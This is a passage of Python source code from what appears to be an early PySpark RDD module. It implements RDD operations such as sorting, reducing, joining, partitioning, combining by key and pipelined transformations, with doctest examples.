>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda x: (len(x[1][0]) != 0) and (len(x[1][1]) != 0)) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer == serializer:
return self
else:
converted = self.map(lambda x: x, preservesPartitioning=True)
converted._jrdd_deserializer = serializer
return converted
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc = lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5), ('little', 4), ('Mary', 1), ('was', 8), ('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self.ctx.defaultParallelism
bounds = list()
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
if numPartitions > 1:
rddSize = self.count()
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda (k, v): k).collect()
samples = sorted(samples, reverse=(not ascending), key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
for i in range(0, numPartitions - 1):
index = (len(samples) - 1) * (i + 1) / numPartitions
bounds.append(samples[index])
def rangePartitionFunc(k):
p = 0
while p < len(bounds) and keyfunc(k) > bounds[p]:
p += 1
if ascending:
return p
else:
return numPartitions-1-p
def mapFunc(iterator):
yield sorted(iterator, reverse=(not ascending), key=lambda (k, v): keyfunc(k))
return (self.partitionBy(numPartitions, partitionFunc=rangePartitionFunc)
.mapPartitions(mapFunc,preservesPartitioning=True)
.flatMap(lambda x: x, preservesPartitioning=True))
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator): yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
['1', '2', '', '3']
"""
def func(iterator):
pipe = Popen(shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
out.write(str(obj).rstrip('\n') + '\n')
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip('\n') for x in iter(pipe.stdout.readline, ''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
yield None
self.mapPartitions(processPartition).collect() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print x
... yield None
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
self.mapPartitions(f).collect() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with _JavaStackTrace(self.context) as st:
bytesInJava = self._jrdd.collect().iterator()
return list(self._collect_iterator_through_file(bytesInJava))
def _collect_iterator_through_file(self, iterator):
# Transferring lots of data through Py4J can be slow because
# socket.readline() is inefficient. Instead, we'll dump the data to a
# file and read it back.
tempFile = NamedTemporaryFile(delete=False, dir=self.ctx._temp_dir)
tempFile.close()
self.ctx._writeToFile(iterator, tempFile.name)
# Read the data into Python and deserialize it:
with open(tempFile.name, 'rb') as tempFile:
for item in self._jrdd_deserializer.load_stream(tempFile):
yield item
os.unlink(tempFile.name)
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
"""
def func(iterator):
acc = None
for obj in iterator:
if acc is None:
acc = obj
else:
acc = f(obj, acc)
if acc is not None:
yield acc
vals = self.mapPartitions(func).collect()
return reduce(f, vals)
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def max(self):
"""
Find the maximum item in this RDD.
>>> sc.parallelize([1.0, 5.0, 43.0, 10.0]).max()
43.0
"""
return self.reduce(max)
def min(self):
"""
Find the minimum item in this RDD.
>>> sc.parallelize([1.0, 5.0, 43.0, 10.0]).min()
1.0
"""
return self.reduce(min)
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for (k, v) in m2.iteritems():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
"""
def topIterator(iterator):
q = []
for k in iterator:
if len(q) < num:
heapq.heappush(q, k)
else:
heapq.heappushpop(q, k)
yield q
def merge(a, b):
return next(topIterator(a + b))
return sorted(self.mapPartitions(topIterator).reduce(merge), reverse=True)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def topNKeyedElems(iterator, key_=None):
q = MaxHeapQ(num)
for k in iterator:
if key_ != None:
k = (key_(k), k)
q.insert(k)
yield q.getElements()
def unKey(x, key_=None):
if key_ != None:
x = [i[1] for i in x]
return x
def merge(a, b):
return next(topNKeyedElems(a + b))
result = self.mapPartitions(lambda i: topNKeyedElems(i, key)).reduce(merge)
return sorted(unKey(result, key), key=key)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self._jrdd.splits().size()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the first iteration, just
# try all partitions next. Otherwise, interpolate the number
# of partitions we need to try, but overestimate it by 50%.
if len(items) == 0:
numPartsToTry = totalParts - 1
else:
numPartsToTry = int(1.5 * num * partsScanned / len(items))
left = num - len(items)
def takeUpToNumLeft(iterator):
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
"""
return self.take(1)[0]
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).collect())
[1, 2, 'rdd', 'spark']
"""
self._reserialize(BatchedSerializer(PickleSerializer(),
batchSize))._jrdd.saveAsObjectFile(path)
def saveAsTextFile(self, path):
"""
Save this RDD as a text file, using string representations of elements.
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, basestring):
x = unicode(x)
yield x.encode("utf-8")
keyed = PipelinedRDD(self, func)
keyed._bypass_serializer = True
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda (k, v): k)
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda (k, v): v)
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for (k, v) in iterator:
m[k] = v if k not in m else func(m[k], v)
yield m
def mergeMaps(m1, m2):
for (k, v) in m2.iteritems():
m1[k] = v if k not in m1 else func(m1[k], v)
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in other have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
def partitionBy(self, numPartitions, partitionFunc=None):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> set(sets[0]).intersection(set(sets[1]))
set([])
"""
if numPartitions is None:
numPartitions = self.ctx.defaultParallelism
if partitionFunc is None:
partitionFunc = lambda x: 0 if x is None else hash(x)
# Transferring O(n) objects to Java is too expensive. Instead, we'll
# form the hash buckets in Python, transferring O(numPartitions) objects
# to Java. Each object is a (splitNumber, [objects]) pair.
outputSerializer = self.ctx._unbatched_serializer
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
for (k, v) in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
for (split, items) in buckets.iteritems():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = PipelinedRDD(self, add_shuffle_key)
keyed._bypass_serializer = True
with _JavaStackTrace(self.context) as st:
pairRDD = self.ctx._jvm.PairwiseRDD(keyed._jrdd.rdd()).asJavaPairRDD()
partitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = pairRDD.partitionBy(partitioner).values()
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
# This is required so that id(partitionFunc) remains unique, even if
# partitionFunc is a lambda:
rdd._partitionFunc = partitionFunc
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self.ctx.defaultParallelism
def combineLocally(iterator):
combiners = {}
for x in iterator:
(k, v) = x
if k not in combiners:
combiners[k] = createCombiner(v)
else:
combiners[k] = mergeValue(combiners[k], v)
return combiners.iteritems()
locally_combined = self.mapPartitions(combineLocally)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
combiners = {}
for (k, v) in iterator:
if not k in combiners:
combiners[k] = v
else:
combiners[k] = mergeCombiners(combiners[k], v)
return combiners.iteritems()
return shuffled.mapPartitions(_mergeCombiners)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None):
"""
Aggregate the values of each key, using given combine functions and a neutral "zero value".
This function can return a different result type, U, than the type of the values in this RDD,
V. Thus, we need one operation for merging a V into a U and one operation for merging two U's,
The former operation is used for merging values within a partition, and the latter is used
for merging values between partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions)
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> rdd.foldByKey(0, add).collect()
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions)
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with into numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey will provide much
better performance.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> map((lambda (x,y): (x, list(y))), sorted(x.groupByKey().collect()))
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
return a + b
return self.combineByKey(createCombiner, mergeValue, mergeCombiners,
numPartitions).mapValues(lambda x: ResultIterable(x))
# TODO: add tests
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda (k, v): ((k, x) for x in f(v))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda (k, v): (k, f(v))
return self.map(map_values_fn, preservesPartitioning=True)
# TODO: support varargs cogroup of several RDDs.
def groupWith(self, other):
"""
Alias for cogroup.
"""
return self.cogroup(other)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1])))), sorted(list(x.cogroup(y).collect())))
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup(self, other, numPartitions)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
filter_func = lambda (key, vals): len(vals[0]) > 0 and len(vals[1]) == 0
map_func = lambda (key, vals): [(key, val) for val in vals[0]]
return self.cogroup(other, numPartitions).filter(filter_func).flatMap(map_func)
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
rdd = other.map(lambda x: (x, True)) # note: here 'True' is just a placeholder
return self.map(lambda x: (x, True)).subtractByKey(rdd).map(lambda tpl: tpl[0]) # note: here 'True' is just a placeholder
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> map((lambda (x,y): (x, (list(y[0]), (list(y[1]))))), sorted(x.cogroup(y).collect()))
[(0, ([0], [0])), (1, ([1], [1])), (2, ([], [2])), (3, ([], [3])), (4, ([2], [4]))]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def name(self):
"""
Return the name of this RDD.
"""
name_ = self._jrdd.name()
if not name_:
return None
return name_.encode('utf-8')
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.setName('RDD1')
>>> rdd1.name()
'RDD1'
"""
self._jrdd.setName(name)
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if not debug_string:
return None
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
# TODO: `lookup` is disabled because we can't make direct comparisons based
# on the key; we need to compare the hash of the key to the hash of the
# keys in the pairs. This could be an expensive operation, since those
# hashes aren't retained.
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
command = (self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_command = CloudPickleSerializer().dumps(command)
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in self.ctx._pickled_broadcast_vars],
self.ctx._gateway._gateway_client)
self.ctx._pickled_broadcast_vars.clear()
class_tag = self._prev_jrdd.classTag()
env = MapConverter().convert(self.ctx.environment,
self.ctx._gateway._gateway_client)
includes = ListConverter().convert(self.ctx._python_includes,
self.ctx._gateway._gateway_client)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_command), env, includes, self.preservesPartitioning,
self.ctx.pythonExec, broadcast_vars, self.ctx._javaAccumulator,
class_tag)
